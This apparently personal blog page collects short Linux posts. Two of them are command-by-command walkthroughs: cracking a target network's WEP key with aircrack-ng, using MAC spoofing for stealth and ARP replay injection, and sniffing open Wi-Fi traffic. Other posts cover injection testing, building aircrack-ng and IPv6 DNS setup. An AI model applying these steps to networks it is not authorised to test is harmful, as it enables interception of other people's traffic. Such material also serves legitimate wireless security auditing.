Breaking WEP Encryption

Comments Off

Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng –fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one mon0
      2. aireplay-ng –arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one -e SSID mon0
      3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0

Open Wireless Network Packet Sniffing

Comments Off

This is easier and more effective than packet sniffing on a wired network:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Set your WiFi card into monitoring mode: airmon-ng start wlan0
  3. See what’s around: airodump-ng mon0
  4. Select a target network, and note the BSSID value and channel (used as ‘-c’ option below)
  5. Collect the packet trace: airodump-ng -c 6 –bssid 00:12:34:56:78:90 -w output-file mon0
  6. Examine packet trace: wireshare output-file.cap

(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)

WiFi Card – Packet Injection in Linux

Comments Off

Very simple way to test if your WiFi card supports injection:

Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmod-ng start wlan0
Test using: aireplay-ng -9 mon0

With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!

I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000

Aircrack-ng for Debian Wheezy (testing)

Comments Off

After discovering that Aircrack-ng isn’t currently included in Debian Wheezy (but it is in both Stable and Sid), I grabbed the latest version out of SVN (v1.1 – r2128) and built the package for my x86-64 system.

Source and compiled executables are available here.

I have included the necessary scripts and binary files in the ‘bin/’ directory. Copy these to /usr/local/sbin/ – so they will be easy to remove when the aircrack-ng packages becomes available in Wheezy.

IPv6 DNS Advertisements

Comments Off

DNS client configuration can be handled by the standard Router Advertisement Daemon (radvd) – apt-get install radvd

Edit /etc/radvd.conf on your Linux Router and insert the following at the end of the file to use Google’s DNS Caching server:

RDNS 2001:4860:4860::8888
{
};

On your Linux clients install rdnssd. To automatically add the advertised IPv6 DNS servers to your /etc/resolv.conf

The /etc/resolv.conf now contains both IPv4 and IPv6 entries. Typically a DHCP client is adding the IPv4 DNS server entries, this can be prevented by removing ‘domain-name-servers’ from the ‘request’ line in dhclient.conf

Older Entries Newer Entries